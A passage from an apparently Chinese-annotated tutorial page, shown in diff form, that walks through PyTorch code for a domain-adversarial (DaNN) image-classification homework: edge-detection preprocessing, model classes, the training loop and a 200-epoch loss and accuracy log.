                        # Turn RGB to grayscale. (Bacause Canny do not support RGB images.)
                        transforms.Grayscale(), # 转换为灰度图
                        # cv2 do not support skimage.Image, so we transform it to np.array,
                        # and then adopt cv2.Canny algorithm.
                        transforms.Lambda(lambda x: cv2.Canny(np.array(x), 170, 300)), # 应用 Canny 边缘检测
                        # Transform np.array back to the skimage.Image.
                        transforms.ToPILImage(), # 转换为 PIL 图像对象
                        # 50% Horizontal Flip. (For Augmentation)
                        transforms.RandomHorizontalFlip(), # 50% 概率水平翻转
                        # Rotate +- 15 degrees. (For Augmentation), and filled with zero
                        # if there's empty pixel after rotation.
                        transforms.RandomRotation(15, fill=(0,)), # 旋转 ±15 度,空白像素填充为 0
                        # Transform to tensor for model inputs.
                        transforms.ToTensor(), # 转换为 PyTorch 张量
                        ])

                        # target_transform 则不包含边缘检测,而是对图像大小进行了调整(从 28x28 调整到 32x32),以便与训练数据一致。
                        target_transform = transforms.Compose([
                        # Turn RGB to grayscale.
                        transforms.Grayscale(),
                        # Resize: size of source data is 32x32, thus we need to
                        # enlarge the size of target data from 28x28 to 32x32。
                        transforms.Resize((32, 32)), # 调整大小到 32x32
                        # 50% Horizontal Flip. (For Augmentation)
                        transforms.RandomHorizontalFlip(),
                        # Rotate +- 15 degrees. (For Augmentation), and filled with zero
                        # if there's empty pixel after rotation.
                        transforms.RandomRotation(15, fill=(0,)),
                        # Transform to tensor for model inputs.
                        transforms.ToTensor(),
                        ])

                        # ImageFolder 类从指定路径加载图像文件夹中的数据,并将 source_transform 和 target_transform 应用于图像数据。
                        source_dataset = ImageFolder('real_or_drawing/train_data', transform=source_transform)
                        target_dataset = ImageFolder('real_or_drawing/test_data', transform=target_transform)

                        # 这里的 DataLoader 为训练和测试集创建批量加载器,将数据分批次加载到模型中。
                        # batch_size=32 表示每个批次包含 32 张图像,shuffle=True 用于随机打乱训练集的顺序,有助于减少过拟合。
                        # test_dataloader 用于加载测试数据,shuffle=False 表示测试集的顺序不会被打乱。
                        source_dataloader = DataLoader(source_dataset, batch_size=32, shuffle=True)
                        target_dataloader = DataLoader(target_dataset, batch_size=32, shuffle=True)
                        test_dataloader = DataLoader(target_dataset, batch_size=128, shuffle=False)

                        模型

                        ​ Feature Extractor:经典 VGG 式架构

                        ​ 标签预测器/域分类器:线性模型。

                        -
                        class FeatureExtractor(nn.Module):

                        def __init__(self):
                        super(FeatureExtractor, self).__init__()

                        # FeatureExtractor 是一个卷积神经网络,用于从输入图像中提取高维特征。该模块包含 5 个卷积层块,每个块包括:
                        self.conv = nn.Sequential(
                        nn.Conv2d(1, 64, 3, 1, 1), # 一个卷积层(Conv2d)用于提取空间特征;
                        nn.BatchNorm2d(64), # 批归一化层(BatchNorm2d),用于稳定训练过程;
                        nn.ReLU(), # ReLU 激活函数,使网络具有非线性;
                        nn.MaxPool2d(2), # 最大池化层(MaxPool2d),用于下采样和减少特征图的尺寸。

                        nn.Conv2d(64, 128, 3, 1, 1),
                        nn.BatchNorm2d(128),
                        nn.ReLU(),
                        nn.MaxPool2d(2),

                        nn.Conv2d(128, 256, 3, 1, 1),
                        nn.BatchNorm2d(256),
                        nn.ReLU(),
                        nn.MaxPool2d(2),

                        nn.Conv2d(256, 256, 3, 1, 1),
                        nn.BatchNorm2d(256),
                        nn.ReLU(),
                        nn.MaxPool2d(2),

                        nn.Conv2d(256, 512, 3, 1, 1),
                        nn.BatchNorm2d(512),
                        nn.ReLU(),
                        nn.MaxPool2d(2)
                        )

                        def forward(self, x):
                        x = self.conv(x).squeeze()
                        return x

                        class LabelPredictor(nn.Module):

                        def __init__(self):
                        super(LabelPredictor, self).__init__()

                        self.layer = nn.Sequential(
                        nn.Linear(512, 512), # 第一和第二层是 512 维输入和 512 维输出的全连接层,分别通过 ReLU 激活;
                        nn.ReLU(),

                        nn.Linear(512, 512),
                        nn.ReLU(),

                        nn.Linear(512, 10), # 最后一层是一个全连接层,输出大小为 10,用于分类。
                        )

                        def forward(self, h):
                        c = self.layer(h)
                        return c

                        class DomainClassifier(nn.Module):

                        def __init__(self):
                        super(DomainClassifier, self).__init__()

                        self.layer = nn.Sequential(
                        nn.Linear(512, 512), # 每个隐藏层之后都有批归一化(BatchNorm1d)和 ReLU 激活。
                        nn.BatchNorm1d(512),
                        nn.ReLU(),

                        nn.Linear(512, 512),
                        nn.BatchNorm1d(512),
                        nn.ReLU(),

                        nn.Linear(512, 512),
                        nn.BatchNorm1d(512),
                        nn.ReLU(),

                        nn.Linear(512, 512),
                        nn.BatchNorm1d(512),
                        nn.ReLU(),

                        nn.Linear(512, 1), # 最后一层是一个单神经元输出层(Linear(512, 1)),用于预测域标签。
                        )

                        def forward(self, h):
                        y = self.layer(h)
                        return y
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        14
                        15
                        16
                        17
                        18
                        19
                        20
                        21
                        22
                        23
                        24
                        25
                        26
                        27
                        28
                        29
                        30
                        31
                        32
                        33
                        34
                        35
                        36
                        37
                        38
                        39
                        40
                        41
                        42
                        43
                        44
                        45
                        46
                        47
                        48
                        49
                        50
                        51
                        52
                        53
                        54
                        55
                        56
                        57
                        58
                        59
                        60
                        61
                        62
                        63
                        64
                        65
                        66
                        67
                        68
                        69
                        70
                        71
                        72
                        73
                        74
                        75
                        76
                        77
                        78
                        79
                        80
                        81
                        82
                        83
                        84
                        class FeatureExtractor(nn.Module):

                        def __init__(self):
                        super(FeatureExtractor, self).__init__()

                        # FeatureExtractor 是一个卷积神经网络,用于从输入图像中提取高维特征。该模块包含 5 个卷积层块,每个块包括:
                        self.conv = nn.Sequential(
                        nn.Conv2d(1, 64, 3, 1, 1), # 一个卷积层(Conv2d)用于提取空间特征;
                        nn.BatchNorm2d(64), # 批归一化层(BatchNorm2d),用于稳定训练过程;
                        nn.ReLU(), # ReLU 激活函数,使网络具有非线性;
                        nn.MaxPool2d(2), # 最大池化层(MaxPool2d),用于下采样和减少特征图的尺寸。

                        nn.Conv2d(64, 128, 3, 1, 1),
                        nn.BatchNorm2d(128),
                        nn.ReLU(),
                        nn.MaxPool2d(2),

                        nn.Conv2d(128, 256, 3, 1, 1),
                        nn.BatchNorm2d(256),
                        nn.ReLU(),
                        nn.MaxPool2d(2),

                        nn.Conv2d(256, 256, 3, 1, 1),
                        nn.BatchNorm2d(256),
                        nn.ReLU(),
                        nn.MaxPool2d(2),

                        nn.Conv2d(256, 512, 3, 1, 1),
                        nn.BatchNorm2d(512),
                        nn.ReLU(),
                        nn.MaxPool2d(2)
                        )

                        def forward(self, x):
                        x = self.conv(x).squeeze()
                        return x

                        class LabelPredictor(nn.Module):

                        def __init__(self):
                        super(LabelPredictor, self).__init__()

                        self.layer = nn.Sequential(
                        nn.Linear(512, 512), # 第一和第二层是 512 维输入和 512 维输出的全连接层,分别通过 ReLU 激活;
                        nn.ReLU(),

                        nn.Linear(512, 512),
                        nn.ReLU(),

                        nn.Linear(512, 10), # 最后一层是一个全连接层,输出大小为 10,用于分类。
                        )

                        def forward(self, h):
                        c = self.layer(h)
                        return c

                        class DomainClassifier(nn.Module):

                        def __init__(self):
                        super(DomainClassifier, self).__init__()

                        self.layer = nn.Sequential(
                        nn.Linear(512, 512), # 每个隐藏层之后都有批归一化(BatchNorm1d)和 ReLU 激活。
                        nn.BatchNorm1d(512),
                        nn.ReLU(),

                        nn.Linear(512, 512),
                        nn.BatchNorm1d(512),
                        nn.ReLU(),

                        nn.Linear(512, 512),
                        nn.BatchNorm1d(512),
                        nn.ReLU(),

                        nn.Linear(512, 512),
                        nn.BatchNorm1d(512),
                        nn.ReLU(),

                        nn.Linear(512, 1), # 最后一层是一个单神经元输出层(Linear(512, 1)),用于预测域标签。
                        )

                        def forward(self, h):
                        y = self.layer(h)
                        return y

                        预处理

                        ​ 在这里,我们使用 Adam 作为我们的优化器。

                        -
                        # 初始化模型并将其移动到 GPU
                        feature_extractor = FeatureExtractor().cuda()
                        label_predictor = LabelPredictor().cuda()
                        domain_classifier = DomainClassifier().cuda()

                        # 定义损失函数
                        class_criterion = nn.CrossEntropyLoss() # 交叉熵损失函数,用于分类任务。它会在 LabelPredictor 输出的类别概率分布和真实标签之间计算损失。
                        domain_criterion = nn.BCEWithLogitsLoss() # 二元交叉熵损失(带 Logits,即自动处理 sigmoid 函数),用于二分类任务。这里用于计算 DomainClassifier 的域分类损失(判断样本属于哪个域),即通过二值标签来判断样本来自哪个数据分布。

                        # 每个优化器使用 Adam 优化算法(optim.Adam),适合处理深度学习任务中的大量参数和梯度不稳定的问题。
                        optimizer_F = optim.Adam(feature_extractor.parameters())
                        optimizer_C = optim.Adam(label_predictor.parameters())
                        optimizer_D = optim.Adam(domain_classifier.parameters())
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        # 初始化模型并将其移动到 GPU
                        feature_extractor = FeatureExtractor().cuda()
                        label_predictor = LabelPredictor().cuda()
                        domain_classifier = DomainClassifier().cuda()

                        # 定义损失函数
                        class_criterion = nn.CrossEntropyLoss() # 交叉熵损失函数,用于分类任务。它会在 LabelPredictor 输出的类别概率分布和真实标签之间计算损失。
                        domain_criterion = nn.BCEWithLogitsLoss() # 二元交叉熵损失(带 Logits,即自动处理 sigmoid 函数),用于二分类任务。这里用于计算 DomainClassifier 的域分类损失(判断样本属于哪个域),即通过二值标签来判断样本来自哪个数据分布。

                        # 每个优化器使用 Adam 优化算法(optim.Adam),适合处理深度学习任务中的大量参数和梯度不稳定的问题。
                        optimizer_F = optim.Adam(feature_extractor.parameters())
                        optimizer_C = optim.Adam(label_predictor.parameters())
                        optimizer_D = optim.Adam(domain_classifier.parameters())

                        开始训练

                        DaNN 实施

                        ​ 在原始论文中,使用了 Gradient Reversal Layer。 Feature Extractor、Label Predictor 和 Domain Classifier 都同时进行训练。在这段代码中,我们首先训练 Domain Classifier,然后训练我们的 Feature Extractor(与 GAN 中的 Generator 和 Discriminator 训练过程的概念相同)。

                        @@ -748,18 +746,18 @@

                        hw11_d
                      • 控制域对抗性损失的 Lambda 在原始论文中是自适应的。您可以参考原著。此处 lambda 设置为 0.1。
                      • 我们没有用于目标数据的标签,您只能通过将结果上传到 kaggle 来评估您的模型:)
                      -
                      def train_epoch(source_dataloader, target_dataloader, lamb):
                      '''
                      Args:
                      source_dataloader: source data 的 dataloader
                      target_dataloader: target data 的 dataloader
                      lamb: control the balance of domain adaptatoin and classification. 控制域适配与分类之间的平衡
                      '''

                      # D loss: Domain Classifier 的 loss
                      # F loss: Feature Extrator & Label Predictor 的 loss
                      # running_D_loss 用于累计域分类器的损失;
                      # running_F_loss 用于累计特征提取器和标签分类器的损失;
                      running_D_loss, running_F_loss = 0.0, 0.0
                      # total_hit 和 total_num 用于计算源域的分类准确率。
                      total_hit, total_num = 0.0, 0.0

                      for i, ((source_data, source_label), (target_data, _)) in enumerate(zip(source_dataloader, target_dataloader)):
                      # 这个循环同时迭代源域和目标域的数据批次。每次迭代中,source_data 和 source_label 为源域的图像和标签,target_data 为目标域的图像。
                      source_data = source_data.cuda()
                      source_label = source_label.cuda()
                      target_data = target_data.cuda()

                      # Mixed the source data and target data, or it'll mislead the running params
                      # of batch_norm. (runnning mean/var of soucre and target data are different.)
                      mixed_data = torch.cat([source_data, target_data], dim=0)
                      domain_label = torch.zeros([source_data.shape[0] + target_data.shape[0], 1]).cuda()
                      # set domain label of source data to be 1.
                      domain_label[:source_data.shape[0]] = 1

                      # Step 1 : train domain classifier
                      # 第一步:训练域分类器
                      # 提取合并数据的特征 feature,feature.detach() 防止梯度反向传播到 feature_extractor。
                      feature = feature_extractor(mixed_data)
                      # We don't need to train feature extractor in step 1.
                      # Thus we detach the feature neuron to avoid backpropgation.
                      domain_logits = domain_classifier(feature.detach())
                      # 使用域标签 domain_label 和预测的 domain_logits 计算域分类损失 loss。
                      loss = domain_criterion(domain_logits, domain_label)
                      running_D_loss += loss.item()
                      loss.backward()
                      optimizer_D.step()

                      # Step 2 : train feature extractor and label classifier
                      # 第二步:训练特征提取器和标签分类器
                      # class_logits 是标签分类器的预测结果,用于源域的分类。
                      class_logits = label_predictor(feature[:source_data.shape[0]])
                      # domain_logits 用于域分类。
                      domain_logits = domain_classifier(feature)
                      # loss = cross entropy of classification - lamb * domain binary cross entropy.
                      # The reason why using subtraction is similar to generator loss in disciminator of GAN
                      # 损失函数包括源域的分类损失 class_criterion(class_logits, source_label) 和域适配损失 domain_criterion(domain_logits, domain_label),两者相减以达到类似对抗训练的效果。
                      loss = class_criterion(class_logits, source_label) - lamb * domain_criterion(domain_logits, domain_label)
                      running_F_loss += loss.item()
                      loss.backward()
                      # 更新 feature_extractor 和 label_predictor 的参数。
                      # 每次训练批次后清零梯度,并计算源域的分类准确率。
                      optimizer_F.step()
                      optimizer_C.step()

                      optimizer_D.zero_grad()
                      optimizer_F.zero_grad()
                      optimizer_C.zero_grad()

                      total_hit += torch.sum(torch.argmax(class_logits, dim=1) == source_label).item()
                      total_num += source_data.shape[0]
                      print(i, end='\r')

                      return running_D_loss / (i+1), running_F_loss / (i+1), total_hit / total_num

                      # train 200 epochs
                      # 在 200 个 epoch 中循环,每次 epoch 后保存模型参数并输出训练的损失和准确率。
                      for epoch in range(200):

                      train_D_loss, train_F_loss, train_acc = train_epoch(source_dataloader, target_dataloader, lamb=0.1)

                      torch.save(feature_extractor.state_dict(), f'extractor_model.bin')
                      torch.save(label_predictor.state_dict(), f'predictor_model.bin')

                      print('epoch {:>3d}: train D loss: {:6.4f}, train F loss: {:6.4f}, acc {:6.4f}'.format(epoch, train_D_loss, train_F_loss, train_acc))
                      -
                      epoch   0: train D loss: 0.6715, train F loss: 1.8669, acc 0.2928
                      epoch 1: train D loss: 0.6264, train F loss: 1.5707, acc 0.4166
                      epoch 2: train D loss: 0.5412, train F loss: 1.4445, acc 0.4794
                      epoch 3: train D loss: 0.5390, train F loss: 1.3692, acc 0.4992
                      epoch 4: train D loss: 0.5540, train F loss: 1.3243, acc 0.5140
                      epoch 5: train D loss: 0.5439, train F loss: 1.2459, acc 0.5480
                      epoch 6: train D loss: 0.5538, train F loss: 1.2264, acc 0.5482
                      epoch 7: train D loss: 0.5369, train F loss: 1.1544, acc 0.5800
                      epoch 8: train D loss: 0.5194, train F loss: 1.1397, acc 0.5838
                      epoch 9: train D loss: 0.5368, train F loss: 1.0921, acc 0.5950
                      epoch 10: train D loss: 0.5298, train F loss: 1.0657, acc 0.6070
                      epoch 11: train D loss: 0.5146, train F loss: 1.0287, acc 0.6186
                      epoch 12: train D loss: 0.5331, train F loss: 0.9963, acc 0.6338
                      epoch 13: train D loss: 0.5301, train F loss: 0.9842, acc 0.6412
                      epoch 14: train D loss: 0.5383, train F loss: 0.9447, acc 0.6488
                      epoch 15: train D loss: 0.5252, train F loss: 0.9263, acc 0.6560
                      epoch 16: train D loss: 0.5268, train F loss: 0.8820, acc 0.6748
                      epoch 17: train D loss: 0.5110, train F loss: 0.8503, acc 0.6848
                      epoch 18: train D loss: 0.4955, train F loss: 0.8061, acc 0.7070
                      epoch 19: train D loss: 0.5145, train F loss: 0.7806, acc 0.7096
                      epoch 20: train D loss: 0.4760, train F loss: 0.7562, acc 0.7194
                      epoch 21: train D loss: 0.4721, train F loss: 0.7087, acc 0.7350
                      epoch 22: train D loss: 0.4876, train F loss: 0.6906, acc 0.7458
                      epoch 23: train D loss: 0.4821, train F loss: 0.6563, acc 0.7580
                      epoch 24: train D loss: 0.4547, train F loss: 0.6063, acc 0.7780
                      epoch 25: train D loss: 0.4642, train F loss: 0.6035, acc 0.7788
                      epoch 26: train D loss: 0.4758, train F loss: 0.5768, acc 0.7826
                      epoch 27: train D loss: 0.4539, train F loss: 0.5465, acc 0.7956
                      epoch 28: train D loss: 0.4447, train F loss: 0.4864, acc 0.8144
                      epoch 29: train D loss: 0.4610, train F loss: 0.5191, acc 0.8064
                      epoch 30: train D loss: 0.4341, train F loss: 0.4504, acc 0.8372
                      epoch 31: train D loss: 0.4363, train F loss: 0.4291, acc 0.8380
                      epoch 32: train D loss: 0.4493, train F loss: 0.4082, acc 0.8508
                      epoch 33: train D loss: 0.4308, train F loss: 0.3958, acc 0.8506
                      epoch 34: train D loss: 0.4318, train F loss: 0.3513, acc 0.8658
                      epoch 35: train D loss: 0.4356, train F loss: 0.3378, acc 0.8708
                      epoch 36: train D loss: 0.3975, train F loss: 0.3467, acc 0.8684
                      epoch 37: train D loss: 0.4213, train F loss: 0.3099, acc 0.8794
                      epoch 38: train D loss: 0.3939, train F loss: 0.2874, acc 0.8900
                      epoch 39: train D loss: 0.4279, train F loss: 0.3113, acc 0.8826
                      epoch 40: train D loss: 0.4045, train F loss: 0.2726, acc 0.8916
                      epoch 41: train D loss: 0.4015, train F loss: 0.2682, acc 0.8974
                      epoch 42: train D loss: 0.3976, train F loss: 0.2458, acc 0.9062
                      epoch 43: train D loss: 0.4092, train F loss: 0.2502, acc 0.9026
                      epoch 44: train D loss: 0.3983, train F loss: 0.2196, acc 0.9120
                      epoch 45: train D loss: 0.3920, train F loss: 0.2242, acc 0.9158
                      epoch 46: train D loss: 0.4072, train F loss: 0.2050, acc 0.9168
                      epoch 47: train D loss: 0.3964, train F loss: 0.1852, acc 0.9272
                      epoch 48: train D loss: 0.4001, train F loss: 0.2130, acc 0.9172
                      epoch 49: train D loss: 0.3910, train F loss: 0.1914, acc 0.9248
                      epoch 50: train D loss: 0.3924, train F loss: 0.1978, acc 0.9228
                      epoch 51: train D loss: 0.3916, train F loss: 0.1758, acc 0.9262
                      epoch 52: train D loss: 0.3843, train F loss: 0.1651, acc 0.9314
                      epoch 53: train D loss: 0.3681, train F loss: 0.1555, acc 0.9352
                      epoch 54: train D loss: 0.3960, train F loss: 0.1557, acc 0.9320
                      epoch 55: train D loss: 0.3765, train F loss: 0.1543, acc 0.9356
                      epoch 56: train D loss: 0.3789, train F loss: 0.1420, acc 0.9406
                      epoch 57: train D loss: 0.3878, train F loss: 0.1423, acc 0.9418
                      epoch 58: train D loss: 0.3799, train F loss: 0.1477, acc 0.9396
                      epoch 59: train D loss: 0.3710, train F loss: 0.1316, acc 0.9450
                      epoch 60: train D loss: 0.3815, train F loss: 0.1294, acc 0.9456
                      epoch 61: train D loss: 0.3789, train F loss: 0.1300, acc 0.9466
                      epoch 62: train D loss: 0.3912, train F loss: 0.1273, acc 0.9472
                      epoch 63: train D loss: 0.4002, train F loss: 0.1206, acc 0.9492
                      epoch 64: train D loss: 0.3895, train F loss: 0.1332, acc 0.9432
                      epoch 65: train D loss: 0.3853, train F loss: 0.1152, acc 0.9518
                      epoch 66: train D loss: 0.3878, train F loss: 0.1420, acc 0.9424
                      epoch 67: train D loss: 0.3823, train F loss: 0.1158, acc 0.9478
                      epoch 68: train D loss: 0.3798, train F loss: 0.1131, acc 0.9514
                      epoch 69: train D loss: 0.3736, train F loss: 0.1022, acc 0.9508
                      epoch 70: train D loss: 0.3749, train F loss: 0.1215, acc 0.9498
                      epoch 71: train D loss: 0.3752, train F loss: 0.0972, acc 0.9572
                      epoch 72: train D loss: 0.3745, train F loss: 0.1077, acc 0.9558
                      epoch 73: train D loss: 0.3694, train F loss: 0.1041, acc 0.9562
                      epoch 74: train D loss: 0.3717, train F loss: 0.0976, acc 0.9534
                      epoch 75: train D loss: 0.3718, train F loss: 0.1092, acc 0.9552
                      epoch 76: train D loss: 0.3717, train F loss: 0.0744, acc 0.9648
                      epoch 77: train D loss: 0.3794, train F loss: 0.0861, acc 0.9590
                      epoch 78: train D loss: 0.3652, train F loss: 0.1077, acc 0.9586
                      epoch 79: train D loss: 0.3774, train F loss: 0.0617, acc 0.9674
                      epoch 80: train D loss: 0.3712, train F loss: 0.0974, acc 0.9582
                      epoch 81: train D loss: 0.3725, train F loss: 0.1011, acc 0.9546
                      epoch 82: train D loss: 0.3812, train F loss: 0.0931, acc 0.9596
                      epoch 83: train D loss: 0.3720, train F loss: 0.0634, acc 0.9668
                      epoch 84: train D loss: 0.3752, train F loss: 0.0738, acc 0.9666
                      epoch 85: train D loss: 0.3851, train F loss: 0.1143, acc 0.9536
                      epoch 86: train D loss: 0.3821, train F loss: 0.0813, acc 0.9618
                      epoch 87: train D loss: 0.3911, train F loss: 0.0735, acc 0.9648
                      epoch 88: train D loss: 0.3837, train F loss: 0.0832, acc 0.9604
                      epoch 89: train D loss: 0.3884, train F loss: 0.0757, acc 0.9624
                      epoch 90: train D loss: 0.3728, train F loss: 0.0761, acc 0.9640
                      epoch 91: train D loss: 0.3969, train F loss: 0.0718, acc 0.9632
                      epoch 92: train D loss: 0.3646, train F loss: 0.0668, acc 0.9632
                      epoch 93: train D loss: 0.3808, train F loss: 0.0756, acc 0.9662
                      epoch 94: train D loss: 0.3650, train F loss: 0.0818, acc 0.9628
                      epoch 95: train D loss: 0.3781, train F loss: 0.0610, acc 0.9682
                      epoch 96: train D loss: 0.3837, train F loss: 0.0587, acc 0.9684
                      epoch 97: train D loss: 0.3809, train F loss: 0.0591, acc 0.9680
                      epoch 98: train D loss: 0.3714, train F loss: 0.0626, acc 0.9670
                      epoch 99: train D loss: 0.3909, train F loss: 0.0753, acc 0.9632
                      epoch 100: train D loss: 0.3641, train F loss: 0.0607, acc 0.9696
                      epoch 101: train D loss: 0.3730, train F loss: 0.0853, acc 0.9612
                      epoch 102: train D loss: 0.3746, train F loss: 0.0511, acc 0.9706
                      epoch 103: train D loss: 0.3831, train F loss: 0.0493, acc 0.9700
                      epoch 104: train D loss: 0.3882, train F loss: 0.0751, acc 0.9622
                      epoch 105: train D loss: 0.3777, train F loss: 0.0508, acc 0.9726
                      epoch 106: train D loss: 0.3702, train F loss: 0.0462, acc 0.9732
                      epoch 107: train D loss: 0.3694, train F loss: 0.0542, acc 0.9734
                      epoch 108: train D loss: 0.3700, train F loss: 0.0520, acc 0.9712
                      epoch 109: train D loss: 0.3596, train F loss: 0.0439, acc 0.9738
                      epoch 110: train D loss: 0.3681, train F loss: 0.0544, acc 0.9688
                      epoch 111: train D loss: 0.3840, train F loss: 0.0592, acc 0.9674
                      epoch 112: train D loss: 0.3770, train F loss: 0.0624, acc 0.9682
                      epoch 113: train D loss: 0.3644, train F loss: 0.0531, acc 0.9720
                      epoch 114: train D loss: 0.3787, train F loss: 0.0566, acc 0.9712
                      epoch 115: train D loss: 0.3720, train F loss: 0.0429, acc 0.9746
                      epoch 116: train D loss: 0.3768, train F loss: 0.0489, acc 0.9732
                      epoch 117: train D loss: 0.3765, train F loss: 0.0412, acc 0.9748
                      epoch 118: train D loss: 0.3820, train F loss: 0.0450, acc 0.9724
                      epoch 119: train D loss: 0.3735, train F loss: 0.0386, acc 0.9768
                      epoch 120: train D loss: 0.3774, train F loss: 0.0436, acc 0.9736
                      epoch 121: train D loss: 0.3816, train F loss: 0.0491, acc 0.9708
                      epoch 122: train D loss: 0.3717, train F loss: 0.0587, acc 0.9686
                      epoch 123: train D loss: 0.3802, train F loss: 0.0538, acc 0.9714
                      epoch 124: train D loss: 0.3878, train F loss: 0.0432, acc 0.9762
                      epoch 125: train D loss: 0.3785, train F loss: 0.0453, acc 0.9746
                      epoch 126: train D loss: 0.3749, train F loss: 0.0423, acc 0.9774
                      epoch 127: train D loss: 0.3925, train F loss: 0.0328, acc 0.9766
                      epoch 128: train D loss: 0.3874, train F loss: 0.0546, acc 0.9682
                      epoch 129: train D loss: 0.3843, train F loss: 0.0482, acc 0.9712
                      epoch 130: train D loss: 0.3698, train F loss: 0.0500, acc 0.9736
                      epoch 131: train D loss: 0.3752, train F loss: 0.0368, acc 0.9762
                      epoch 132: train D loss: 0.3818, train F loss: 0.0303, acc 0.9784
                      epoch 133: train D loss: 0.3838, train F loss: 0.0490, acc 0.9722
                      epoch 134: train D loss: 0.3744, train F loss: 0.0332, acc 0.9792
                      epoch 135: train D loss: 0.3743, train F loss: 0.0311, acc 0.9786
                      epoch 136: train D loss: 0.3838, train F loss: 0.0419, acc 0.9728
                      epoch 137: train D loss: 0.3951, train F loss: 0.0352, acc 0.9760
                      epoch 138: train D loss: 0.3878, train F loss: 0.0439, acc 0.9732
                      epoch 139: train D loss: 0.3879, train F loss: 0.0419, acc 0.9736
                      epoch 140: train D loss: 0.3871, train F loss: 0.0355, acc 0.9758
                      epoch 141: train D loss: 0.3819, train F loss: 0.0392, acc 0.9746
                      epoch 142: train D loss: 0.3905, train F loss: 0.0578, acc 0.9722
                      epoch 143: train D loss: 0.3816, train F loss: 0.0350, acc 0.9758
                      epoch 144: train D loss: 0.3899, train F loss: 0.0175, acc 0.9822
                      epoch 145: train D loss: 0.4025, train F loss: 0.0469, acc 0.9748
                      epoch 146: train D loss: 0.3715, train F loss: 0.0345, acc 0.9748
                      epoch 147: train D loss: 0.3841, train F loss: 0.0375, acc 0.9744
                      epoch 148: train D loss: 0.3833, train F loss: 0.0310, acc 0.9802
                      epoch 149: train D loss: 0.3805, train F loss: 0.0263, acc 0.9764
                      epoch 150: train D loss: 0.3763, train F loss: 0.0352, acc 0.9760
                      epoch 151: train D loss: 0.3861, train F loss: 0.0330, acc 0.9778
                      epoch 152: train D loss: 0.3844, train F loss: 0.0340, acc 0.9764
                      epoch 153: train D loss: 0.3902, train F loss: 0.0311, acc 0.9764
                      epoch 154: train D loss: 0.3782, train F loss: 0.0387, acc 0.9760
                      epoch 155: train D loss: 0.3950, train F loss: 0.0180, acc 0.9808
                      epoch 156: train D loss: 0.4017, train F loss: 0.0205, acc 0.9808
                      epoch 157: train D loss: 0.3952, train F loss: 0.0484, acc 0.9734
                      epoch 158: train D loss: 0.3885, train F loss: 0.0346, acc 0.9776
                      epoch 159: train D loss: 0.3916, train F loss: 0.0202, acc 0.9812
                      epoch 160: train D loss: 0.3980, train F loss: 0.0306, acc 0.9774
                      epoch 161: train D loss: 0.3897, train F loss: 0.0306, acc 0.9800
                      epoch 162: train D loss: 0.3909, train F loss: 0.0164, acc 0.9816
                      epoch 163: train D loss: 0.3911, train F loss: 0.0273, acc 0.9806
                      epoch 164: train D loss: 0.3737, train F loss: 0.0133, acc 0.9830
                      epoch 165: train D loss: 0.4064, train F loss: 0.0520, acc 0.9706
                      epoch 166: train D loss: 0.3951, train F loss: 0.0242, acc 0.9810
                      epoch 167: train D loss: 0.3865, train F loss: 0.0287, acc 0.9810
                      epoch 168: train D loss: 0.3921, train F loss: 0.0141, acc 0.9814
                      epoch 169: train D loss: 0.3862, train F loss: 0.0130, acc 0.9836
                      epoch 170: train D loss: 0.4018, train F loss: 0.0273, acc 0.9764
                      epoch 171: train D loss: 0.4053, train F loss: 0.0254, acc 0.9774
                      epoch 172: train D loss: 0.4040, train F loss: 0.0169, acc 0.9810
                      epoch 173: train D loss: 0.3935, train F loss: 0.0463, acc 0.9734
                      epoch 174: train D loss: 0.3991, train F loss: 0.0199, acc 0.9804
                      epoch 175: train D loss: 0.3919, train F loss: 0.0275, acc 0.9800
                      epoch 176: train D loss: 0.4021, train F loss: 0.0315, acc 0.9780
                      epoch 177: train D loss: 0.3856, train F loss: 0.0289, acc 0.9796
                      epoch 178: train D loss: 0.3880, train F loss: 0.0171, acc 0.9812
                      epoch 179: train D loss: 0.3874, train F loss: 0.0200, acc 0.9824
                      epoch 180: train D loss: 0.3974, train F loss: 0.0243, acc 0.9826
                      epoch 181: train D loss: 0.3981, train F loss: 0.0191, acc 0.9812
                      epoch 182: train D loss: 0.4048, train F loss: 0.0159, acc 0.9822
                      epoch 183: train D loss: 0.3929, train F loss: 0.0212, acc 0.9796
                      epoch 184: train D loss: 0.3944, train F loss: 0.0130, acc 0.9822
                      epoch 185: train D loss: 0.3895, train F loss: 0.0402, acc 0.9752
                      epoch 186: train D loss: 0.3849, train F loss: 0.0136, acc 0.9826
                      epoch 187: train D loss: 0.3791, train F loss: 0.0222, acc 0.9814
                      epoch 188: train D loss: 0.3990, train F loss: 0.0190, acc 0.9812
                      epoch 189: train D loss: 0.3964, train F loss: 0.0317, acc 0.9794
                      epoch 190: train D loss: 0.3935, train F loss: 0.0385, acc 0.9788
                      epoch 191: train D loss: 0.3914, train F loss: 0.0218, acc 0.9812
                      epoch 192: train D loss: 0.3764, train F loss: 0.0212, acc 0.9822
                      epoch 193: train D loss: 0.3782, train F loss: 0.0193, acc 0.9836
                      epoch 194: train D loss: 0.3787, train F loss: 0.0111, acc 0.9832
                      epoch 195: train D loss: 0.4000, train F loss: 0.0239, acc 0.9808
                      epoch 196: train D loss: 0.3830, train F loss: 0.0201, acc 0.9836
                      epoch 197: train D loss: 0.4085, train F loss: 0.0230, acc 0.9802
                      epoch 198: train D loss: 0.3908, train F loss: 0.0197, acc 0.9802
                      epoch 199: train D loss: 0.3981, train F loss: 0.0170, acc 0.9820
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      12
                      13
                      14
                      15
                      16
                      17
                      18
                      19
                      20
                      21
                      22
                      23
                      24
                      25
                      26
                      27
                      28
                      29
                      30
                      31
                      32
                      33
                      34
                      35
                      36
                      37
                      38
                      39
                      40
                      41
                      42
                      43
                      44
                      45
                      46
                      47
                      48
                      49
                      50
                      51
                      52
                      53
                      54
                      55
                      56
                      57
                      58
                      59
                      60
                      61
                      62
                      63
                      64
                      65
                      66
                      67
                      68
                      69
                      70
                      71
                      72
                      73
                      74
                      75
                      76
                      77
                      78
                      79
                      def train_epoch(source_dataloader, target_dataloader, lamb):
                      '''
                      Args:
                      source_dataloader: source data 的 dataloader
                      target_dataloader: target data 的 dataloader
                      lamb: control the balance of domain adaptatoin and classification. 控制域适配与分类之间的平衡
                      '''

                      # D loss: Domain Classifier 的 loss
                      # F loss: Feature Extrator & Label Predictor 的 loss
                      # running_D_loss 用于累计域分类器的损失;
